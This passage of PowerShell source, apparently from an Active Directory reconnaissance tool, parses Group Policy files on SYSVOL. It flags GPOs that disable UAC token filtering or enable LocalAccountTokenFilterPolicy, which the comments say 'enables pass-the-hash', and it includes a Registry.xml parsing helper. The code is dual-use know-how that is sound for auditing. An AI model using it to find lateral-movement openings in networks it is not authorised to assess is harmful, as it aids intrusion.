"$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" } 326 | if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential } 327 | # parse the GptTmpl.inf file (if it exists) for this GPO 328 | $Inf = Get-GptTmpl @ParseArgs 329 | if($Inf -and 
($Inf.psbase.Keys -contains "Registry Values")) 330 | { 331 | $EnableLUA = $Inf["Registry Values"]["MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"] 332 | if ($EnableLUA -and ($EnableLUA[0] -eq 4) -and ($EnableLUA[1] -eq 0)) 333 | { 334 | Write-Verbose "The following GPO enables pass-the-hash by disabling EnableLUA: $GPOdisplayName - $GPOname" 335 | # append to EnableLUA GPO list if it is not already there 336 | if ($RemoteAccessPolicies.EnableLUA -notcontains $GPOname) { $RemoteAccessPolicies.EnableLUA += $GPOname } 337 | } 338 | 339 | $FilterAdministratorToken = $Inf["Registry Values"]["MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken"] 340 | if ($FilterAdministratorToken -and ($FilterAdministratorToken[0] -eq 4) -and ($FilterAdministratorToken[1] -eq 0)) 341 | { 342 | Write-Verbose "The following GPO exempts the RID 500 account from UAC protection by disabling FilterAdministratorToken: $GPOdisplayName - $GPOname" 343 | # append to FilterAdministratorToken GPO list if it is not already there 344 | if ($RemoteAccessPolicies.FilterAdministratorToken -notcontains $GPOname) { $RemoteAccessPolicies.FilterAdministratorToken += $GPOname } 345 | } 346 | } 347 | 348 | # LocalAccountTokenFilterPolicy check via Registry.xml 349 | # clear $ParseArgs for next use. 
350 | $ParseArgs.Clear() 351 | # parse Registry.xml file (if it exists) for LocalAccountTokenFilterPolicy 352 | $ParseArgs = @{ 'RegistryXMLpath' = "$GPOPath\MACHINE\Preferences\Registry\Registry.xml" } 353 | if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential } 354 | Get-RegistryXML @ParseArgs | ForEach-Object { 355 | if ($_.property -eq "LocalAccountTokenFilterPolicy" -and ($_.value -eq "00000001")) 356 | { 357 | Write-Verbose "The following GPO enables pass-the-hash by enabling LocalAccountTokenFilterPolicy: $GPOdisplayName - $GPOname" 358 | # append to EnableLUA GPO list if it is not already there 359 | if ($RemoteAccessPolicies.LocalAccountTokenFilterPolicy -notcontains $GPOname) { $RemoteAccessPolicies.LocalAccountTokenFilterPolicy += $GPOname } 360 | } 361 | } 362 | 363 | # SeDenyNetworkLogonRight and SeDenyRemoteInteractiveLogonRight check via GptTmpl.inf 364 | # Use existing object that parsed the file 365 | if($Inf -and ($Inf.psbase.Keys -contains "Privilege Rights")) 366 | { 367 | $SeDenyNetworkLogonRight = $Inf["Privilege Rights"]["SeDenyNetworkLogonRight"] 368 | if ($SeDenyNetworkLogonRight -and ($SeDenyNetworkLogonRight -contains "*S-1-5-32-544")) 369 | { 370 | Write-Verbose "The following GPO includes the built-in Administrators group within the SeDenyNetworkLogonRight: $GPOdisplayName - $GPOname" 371 | # append to SeDenyNetworkLogonRight GPO list if it is not already there 372 | if ($RemoteAccessPolicies.SeDenyNetworkLogonRight -notcontains $GPOname) { $RemoteAccessPolicies.SeDenyNetworkLogonRight += $GPOname } 373 | } 374 | 375 | $SeDenyRemoteInteractiveLogonRight = $Inf["Privilege Rights"]["SeDenyRemoteInteractiveLogonRight"] 376 | if ($SeDenyRemoteInteractiveLogonRight -and ($SeDenyRemoteInteractiveLogonRight -contains "*S-1-5-32-544")) 377 | { 378 | Write-Verbose "The following GPO includes the built-in Administrators group within the SeDenyRemoteInteractiveLogonRight: $GPOdisplayName - $GPOname" 379 | # append to 
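SeDenyRemoteInteractiveLogonRight GPO list if it is not already there
                if ($RemoteAccessPolicies.SeDenyRemoteInteractiveLogonRight -notcontains $GPOname) { $RemoteAccessPolicies.SeDenyRemoteInteractiveLogonRight += $GPOname }
            }
        }
    }
}

END {
    # return hash table containing lists of GPOs for each remote access policy
    return $RemoteAccessPolicies
}
}

function Get-RegistryXML {
<#
.SYNOPSIS

Helper to parse a Group Policy Preferences Registry.xml file into an array of
custom objects, one per /RegistrySettings/Registry node.

.DESCRIPTION

Reads the Registry.xml at -RegistryXMLPath and emits one PSObject per
<Registry> node with the NoteProperties hive, key, property (the node's
Properties 'name' attribute), type and value. When the path is UNC and
alternate -Credential is supplied, the host's SYSVOL share is first mapped
with Add-RemoteConnection and torn down again in END.

Read or parse failures are reported with Write-Verbose and contribute no
objects; multiple pipeline inputs are accumulated and returned together.

.PARAMETER RegistryXMLpath

The Registry.xml file path name to parse.

.PARAMETER Credential

A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system.

.OUTPUTS

PSObject with NoteProperties hive, key, property, type, value.
#>

    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
        [Alias('Path')]
        [String]
        $RegistryXMLPath,

        [Management.Automation.PSCredential]
        [Management.Automation.CredentialAttribute()]
        $Credential = [Management.Automation.PSCredential]::Empty
    )

    BEGIN {
        # SYSVOL roots mapped with alternate credentials; removed again in END
        $MappedPaths = @{}
        # Accumulator for every pipeline input. It used to be created inside
        # PROCESS, so only the last input's settings survived to END and a
        # failed read left it unset (END then emitted a bare $null).
        $registryKeyArray = New-Object System.Collections.Generic.List[System.Object]
    }

    PROCESS {
        try {

            if (($RegistryXMLPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
                $SysVolPath = "\\$((New-Object System.Uri($RegistryXMLPath)).Host)\SYSVOL"
                if (-not $MappedPaths[$SysVolPath]) {
                    # map IPC$ to this computer if it's not already
                    Add-RemoteConnection -Path $SysVolPath -Credential $Credential
                    $MappedPaths[$SysVolPath] = $True
                }
            }

            # NOTE(review): this content comes from the target's SYSVOL, i.e. a
            # share the operator does not control. The [XML] converter's handling
            # of DTDs / external entities depends on the PowerShell version of the
            # operator host - confirm it does not resolve external references
            # before pointing this at a domain you do not trust.
            [XML]$RegistryXMLcontent = Get-Content $RegistryXMLPath -ErrorAction Stop

            # one object per <Registry> node; its attributes live on the
            # <Properties> child element
            $RegistryXMLcontent | Select-Xml "/RegistrySettings/Registry" | Select-Object -ExpandProperty node | ForEach-Object {

                $GPORegistry = New-Object PSObject
                $GPORegistry | Add-Member Noteproperty "hive" $_.Properties.hive
                $GPORegistry | Add-Member Noteproperty "key" $_.Properties.key
                $GPORegistry | Add-Member Noteproperty "property" $_.Properties.name
                $GPORegistry | Add-Member Noteproperty "type" $_.Properties.type
                $GPORegistry | Add-Member Noteproperty "value" $_.Properties.value

                $registryKeyArray.Add($GPORegistry)

            }
        }
        catch {
            # The message previously interpolated the undefined
            # $TargetRegistryXMLPath, so the failing path never appeared.
            Write-Verbose "[Get-RegistryXML] Error parsing $RegistryXMLPath : $_"
        }
    }

    END {
        # remove the SYSVOL mappings
        $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ }
        # return array of registry settings (unrolled onto the pipeline)
        return $registryKeyArray
    }
}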
